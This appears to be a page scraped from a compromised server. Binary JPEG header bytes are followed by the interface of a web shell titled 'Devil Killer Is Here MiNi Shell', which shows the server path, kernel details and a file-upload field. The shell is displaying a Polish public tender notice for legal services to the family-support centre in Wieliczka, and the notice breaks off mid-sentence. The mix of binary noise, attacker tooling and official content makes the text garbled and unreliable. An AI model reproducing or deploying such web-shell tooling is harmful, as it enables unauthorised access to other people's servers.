JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251209/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251209/0058569201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług kompleksowej obsługi prawnej na rzecz Powiatowego Centrum Pomocy Rodzinie w Wieliczce w 2026 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowe Centrum Pomocy Rodzinie w Wieliczce</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PCPR w Wieliczce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351623150</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niepołomska 26G</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 2880220</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pcpr-wieliczka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcpr-wieliczka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług kompleksowej obsługi prawnej na rzecz Powiatowego Centrum Pomocy Rodzinie w Wieliczce w 2026 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9d96cbe7-ff61-4f7a-ba39-c2fb87be4dd0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00585692</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00059601/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Świadczenie usług kompleksowej obsługi prawnej na rzecz Powiatowego Centrum Pomocy Rodzinie w Wieliczce w 2026 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9d96cbe7-ff61-4f7a-ba39-c2fb87be4dd0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>wykonawcami, odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>Korzystanie z Platformy jest bezpłatne. Wykonawca składa ofertę za pośrednictwem Platformy e-zamówienia. Instrukcja składania<br/>ofert dostępna jest na stronie https://ezamowienia.gov.pl w zakładce „Centrum pomocy” – kafelek „Oferty, wnioski, prace konkursowe”. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”) W szczególnie uzasadnionych<br/>przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia,<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: sekretariat@pcpr-wieliczka.pl (nie dotyczy<br/>składania ofert w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. 2. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia<br/>oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Powiatowe Centrum Pomocy Rodzinie w Wieliczce przetwarza dane zawarte w ofertach<br/>albo we wnioskach o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego, dane znajdujące się w<br/>publicznie dostępnych rejestrach (Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności Gospodarczej RP,<br/>Krajowy Rejestr Karny), w celu prowadzenia postępowań o udzielenie zamówienia publicznego na podstawie przepisów ustawy z<br/>dnia 11 września 2019 r. Prawo zamówień publicznych. Wśród tych informacji mogą pojawiać się dane, które na gruncie<br/>rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (dalej: „RODO”) mają charakter danych osobowych. W związku z art. 13 ust. 1 i 2 oraz art. 14 ust. 1 i 2 RODO<br/>informujemy<br/>Administratorem danych osobowych jest Powiatowe Centrum Pomocy Rodzinie w Wieliczce – reprezentowane przez Dyrektora. Z<br/>Administratorem można się kontaktować pisemnie, za pomocą poczty tradycyjnej pod adresem: Powiatowe Centrum Pomocy<br/>Rodzinie w Wieliczce, ul. Niepołomska 26G, 32-020 Wieliczka lub poprzez email: sekretariat@pcpr-wieliczka.pl.<br/>Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pod adresem siedziby Administratora oraz<br/>poprzez e-mail: iod@iods.pl. Dane osobowe pozyskaliśmy bezpośrednio od Pani/Pana, a w przypadku, kiedy dane nie pochodzą od<br/>osoby, której te dane dotyczą, są one pozyskane od kontrahenta, oferenta lub ze źródeł publicznie dostępnych. Administrator będzie<br/>przetwarzał następujące kategorie danych: nazwa wykonawcy, imię i nazwisko, adres, numer telefonu, adres e-mail, NIP, informacje<br/>dotyczące wykształcenia i uprawnień, inne informacje niezbędne do przeprowadzenia postępowania o udzielenie zamówienia<br/>publicznego i realizacji umowy w sprawie zamówienia publicznego.<br/>Pozyskane dane osobowe będą przetwarzane w celu:<br/>a) wyłonienia wykonawców na realizację zamówienia publicznego, a następnie w celu zawarcia i realizacji umowy (art. 6 ust. 1 lit. b,<br/>c RODO),<br/>b) prawidłowej realizacji postępowania dotyczącego zamówienia publicznego pn. „Zakup usług doradztwa zawodowego” w ramach<br/>projektu FEMP.06.26-IP.01-0298/24 „Aktywne Dziś - Lepsze Jutro” oraz wypełnienia obowiązków prawnych ciążących na<br/>Administratorze, wynikających z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz innych obowiązków prawnych,<br/>w tym księgowo-rachunkowych oraz archiwizacyjnych (art. 6 ust. 1 lit. c RODO),<br/>c) ewentualnego dochodzenia roszczeń lub obrony przed roszczeniami (art. 6 ust. 1 lit. f RODO).<br/>1. Odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie<br/>przepisów prawa, w tym podmioty uprawnione na podstawie Ustawy PZP.<br/>2. Pani/Pana dane mogą być ponadto przekazywane podmiotom przetwarzającym dane osobowe na zlecenie Administratora np.<br/>dostawcom usług IT – przy czym takie podmioty przetwarzają dane wyłącznie na podstawie umowy z Administratorem.<br/>Dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas jej trwania, a następnie okres archiwizacyjny<br/>wynikający z Instrukcji kancelaryjnej.<br/>Podanie danych osobowych jest niezbędne dla celów określonych w pkt IV, a ich niepodanie będzie skutkowało niemożnością<br/>rozpatrzenia oferty i zawarcia umowy. W związku z przetwarzaniem Pani/Pana danych osobowych posiada Pani/Pan prawo do:<br/>1) dostępu do treści swoich danych osobowych,<br/>2) prawo do sprostowania danych*,<br/>3) usunięcia lub ograniczenia przetwarzania danych osobowych,<br/>4) wniesienia sprzeciwu wobec przetwarzania,<br/>5) przenoszenia danych,<br/>- na zasadach i warunkach wynikających z RODO.<br/>Pełna klauzula RODO znajduje się w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 271.1.6.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia publicznego jest świadczenie usług kompleksowej obsługi prawnej na rzecz Powiatowego Centrum Pomocy Rodzinie w Wieliczce w 2026 roku<br/>3.	W ramach realizacji przedmiotu zamówienia na rzecz Powiatowego Centrum Pomocy Rodzinie w Wieliczce Wykonawca zobowiązany jest do zabezpieczenia kompleksowej obsługi prawnej oraz doradztwa prawnego dla Powiatowego Centrum Pomocy Rodzinie wraz z obsługą prawną osób sprawujących rodzinna pieczę zastępczą oraz obsługa prawną Ośrodka Interwencji Kryzysowej w zakresie wszystkich czynności wykonywanych przez Zamawiającego, w tym w szczególności do:<br/>a)	opiniowania pod względem formalnym, prawnym i redakcyjnym w szczególności projektów uchwał, zarządzeń, decyzji, postanowień, pełnomocnictw, upoważnień, pism, regulaminów i innych aktów prawnych wydawanych przez Dyrektora Powiatowego Centrum Pomocy Rodzinie w Wieliczce, oraz w szczególnych przypadkach na polecenie Dyrektora jednostki sporządzanie projektów tych dokumentów;<br/>b)	opiniowanie oraz redagowanie projektów umów związanych z realizacją zewnętrznych projektów finansowanych ze środków publicznych lub innych środków zewnętrznych, w tym do weryfikacja ich zgodności z obowiązującymi przepisami prawa, wymaganiami podmiotów udzielających finansowania oraz interesem Zleceniodawcy, a także do przygotowywania propozycji zmian i opracowywania ich finalnych wersji,<br/>c)	opiniowania pod względem formalnoprawnym umów, ugód i porozumień zawieranych przez Powiatowe Centrum Pomocy Rodzinie w Wieliczce z innymi podmiotami<br/>oraz ich projektów (wzorów), a w szczególnych przypadkach na polecenie Dyrektora jednostki sporządzanie projektów umów;<br/>d)	czynnego udziału w sporządzaniu projektów aktów prawnych zarówno powszechnie obowiązujących, jak i wewnętrznych oraz indywidualnych;<br/>e)	pisemnego sporządzania opinii prawnych i innych opracowań zawierających analizę stanu prawnego oraz konkluzję zawierającą prawidłowe zdaniem opiniującego rozwiązanie;<br/>f)	opiniowania treści korespondencji z organami administracji publicznej, sądami i innymi instytucjami oraz osobami prawnymi i fizycznymi;<br/>g)	sporządzanie pozwów oraz odpowiedzi na pozwy w sprawach sądowych z udziałem jednostki, w tym analiza treści pism procesowych, ocena stanu faktycznego i prawnego, przygotowanie stanowiska urzędu, kompletowanie dokumentacji dowodowej oraz reprezentacja urzędu przed sądem;<br/>h)	udzielania porad prawnych i konsultacji prawnych w zakresie realizacji zadań statutowych jednostki;<br/>i)	udzielania wyjaśnień w zakresie stosowania prawa;<br/>j)	opiniowania pod względem zgodności z prawem spraw w zakresie postępowania egzekucyjnego; <br/>k)	bieżącego doradztwa prawnego z zakresu prawa pracy i ubezpieczeń społecznych;<br/>l)	dokonywania analizy opracowywanych dokumentów w zakresie prowadzenia Zakładowego Funduszu Świadczeń Socjalnych pod kątem zgodności<br/>z obowiązującymi przepisami prawa;<br/>m)	doradztwa prawnego z zakresu prawa zamówień publicznych, stanowiących element finansów publicznych, uwzględniających szczegółowe rozwiązania w obszarze wydatkowania środków publicznych;<br/>n)	uczestnictwa w prowadzonych przez Powiatowe Centrum Pomocy Rodzinie w Wieliczce negocjacjach o nawiązanie, zmianę lub rozwiązanie stosunków prawnych, zwłaszcza umów długoterminowych, o wysokiej wartości przedmiotu umowy, mających na celu rozporządzenie mieniem i innych czynnościach o podobnym charakterze;<br/>o)	udziału w pracach zespołów, komisji, naradach, spotkaniach i innych ciał roboczych powoływanych przez Dyrektora jednostki oraz związanej z tym obsługi prawnej;<br/>p)	świadczenia usług zastępstwa procesowego przed sądami, trybunałami lub innymi organami orzekającymi oraz usług doradztwa prawnego w zakresie zastępstwa procesowego;<br/>q)	podejmowania innych niż ww. czynności w zakresie spraw wymagających obsługi prawnej, ustalonych w porozumieniu z Dyrektorem lub Z-cą Dyrektora Powiatowego Centrum Pomocy w Wieliczce;<br/>r)	udzielanie ustnych i pisemnych porad prawnych związanych z wykonywaniem zadań i obowiązków rodzin zastępczych,<br/>s)	wyjaśnianie przepisów prawa mających zastosowanie w pieczy zastępczej,<br/>t)	pomoc w sporządzaniu pism i wyjaśnień związanych z sytuacja prawną dziecka lub rodziny zastępczej.<br/>4.	Obsługa prawna musi być realizowana z zachowaniem następującego standardu usług:<br/>a)	zapewnienie świadczenia obsługi prawnej osobiście przez radcę prawnego lub adwokata w siedzibie Centrum, w wybrane dwa dni tygodnia, w wymiarze nie mniej niż 8 godzin tygodniowo, w godzinach pracy Powiatowego Centrum Pomocy Rodzinie w Wieliczce (tj. poniedziałek 7:30-17:00, wtorek-piątek 7:30-15:30), tak aby możliwa była realizacja terminowych czynności prawnych,<br/>b)	dopuszcza się możliwość opiniowania i podpisywania przez Wykonawcę dokumentów w sposób elektroniczny z wykorzystaniem kwalifikowanego podpisu elektronicznego,<br/>c)	porady prawne, opinie i inne dokumenty muszą być przygotowywane z należytą starannością, zgodnie z aktualnym stanem prawnym i orzecznictwem,<br/>d)	każda sprawa zgłoszona przez Zamawiającego będzie analizowana indywidualnie, z uwzględnieniem specyfiki sprawy oraz potrzeb Zamawiającego.<br/>5.	Terminy realizacji wybranych punktów z zakresu przedmiotu zamówienia:<br/>a)	opiniowanie pod względem formalnym, prawnym i redakcyjnym projektów uchwał oraz innych aktów prawnych, zarządzeń, decyzji, postanowień, porozumień, pełnomocnictw, upoważnień i pism wydawanych przez Dyrektora Powiatowego Centrum Pomocy Rodzinie w Wieliczce – niezwłocznie z zachowaniem, terminów prawem przypisanych, ale nie dłużej niż 3 dni robocze od daty otrzymania dokumentu przez Wykonawcę,<br/>b)	opiniowanie pod względem formalnoprawnym umów, ugód i porozumień zawieranych przez Powiatowe Centrum Pomocy Rodzinie w Wieliczce z innymi podmiotami<br/>oraz ich projektów (wzorów) – niezwłocznie z zachowaniem, terminów prawem przypisanych, ale nie dłużej niż 3 dni robocze od daty otrzymania dokumentu przez Wykonawcę,<br/>c)	sporządzanie opinii prawnych w zakresie stosowania prawa – niezwłocznie, ale nie dłużej niż 5 dni roboczych od daty otrzymania wniosku przez Wykonawcę,<br/>d)	udzielanie porad, konsultacji oraz opiniowanie projektów umów dotyczących działalności Zamawiającego – niezwłocznie, ale nie dłużej niż 3 dni robocze od daty otrzymania zapytania lub dokumentu przez Wykonawcę, Zamawiający wymaga by w sprawach nagłych porady udzielanie były również poza godzinami urzędowania (dopuszcza się konsultacje telefoniczne i mailowe),<br/>e)	opiniowanie i weryfikacja dokumentacji w zakresie zamówień publicznych udzielanych przez Zamawiającego - niezwłocznie, ale nie dłużej niż 3 dni robocze od daty otrzymania dokumentacji przez Wykonawcę,<br/>f)	sporządzanie projektów pism– niezwłocznie, ale nie dłużej niż 3 dni roboczych od daty wydania polecenia Dyrektora Centrum,<br/>g)	sporządzanie projektów umów, ugód i porozumień– niezwłocznie, ale nie dłużej niż 4 dni robocze od daty wydania polecenia przez Dyrektora Centrum.<br/>6.	W przypadkach skomplikowanych Wykonawca może wydłużyć, za zgodą i w uzgodnieniu nowego terminu z Zamawiającym, terminy realizacji zadań z pkt 5. lit. od a) do g). Zgoda i uzgodnienie nowego terminu wymagają udokumentowania w formie pisemnej tradycyjnej lub w formie elektronicznej.<br/>7.	Przez godzinę świadczenia usługi należy rozumieć godzinę zegarową, równą 60 minut.<br/>8.	Wymiar przedmiotu zamówienia w części I wynosi 480 godzin, co stanowi maksymalna liczbę godzin świadczenia usługi w okresie realizacji umowy, w wymiarze średniomiesięcznym do 40 godzin zegarowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79111000-5 - Usługi w zakresie doradztwa prawnego</p> <p class="mb-0">79112000-2 - Usługi reprezentacji prawnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia publicznego jest świadczenie usług kompleksowej obsługi prawnej na rzecz Powiatowego Centrum Pomocy Rodzinie w Wieliczce w 2026 roku<br/>1.	Przedmiotem zamówienia w części II jest świadczenie usługi specjalistycznego poradnictwa – poradnictwa prawnego dla klientów Ośrodka Interwencji Kryzysowej w Wieliczce, zwanym dalej OIK, w tym w szczególności: <br/>a)	prowadzenie usług specjalistycznego poradnictwa – poradnictwo prawne – dla klientów Ośrodka Interwencji Kryzysowej w Wieliczce,<br/>b)	prowadzenie dokumentacji odbytych konsultacji w teczkach klientów OIK oraz innej dokumentacji związanej bezpośrednio z wykonywaną pracą,<br/>c)	wykonywanie innych czynności zawodowych w obszarze wsparcia rodziny,<br/>d)	współpraca z Pracownikami OIK.<br/>2.	Maksymalna liczba godzin świadczenia usługi w okresie realizacji umowy wynosi: 240 godzin zegarowych, w tym miesięcznie średnio 20 godzin zegarowych.<br/>3.	Ilość godzin świadczenia usługi może ulec zmianie w okresie trwania umowy. W przypadku mniejszej ilości godzin Zamawiający zastrzega sobie prawo do niewykorzystania wszystkich godzin wskazanych SWZ. W takim przypadku Zamawiający zapłaci za faktycznie zrealizowaną liczbę godzin. Wykonawcy nie przysługuje roszczenie zlecenia pełnej liczby godzin określonej w ust. 10. <br/>4.	Przedmiot umowy świadczony będzie: stacjonarnie w budynku OIK<br/>w Wieliczce. <br/>5.	Godziny i daty realizacji usługi będą uzgadniane z Kierownikiem OIK. Zmiana godzin realizacji usługi, każdorazowo wymaga zgody Kierownika OIK, a w przypadku jego nieobecności, Kierownika działu ds. administracyjno-kadrowych w PCPR – za pośrednictwem maila lub w formie papierowej.<br/>Zapewnianie dostępności dla osób ze szczególnymi potrzebami<br/>w realizacji przedmiotu umowy należy do obowiązków Zleceniodawcy. W przypadku zaistnienia 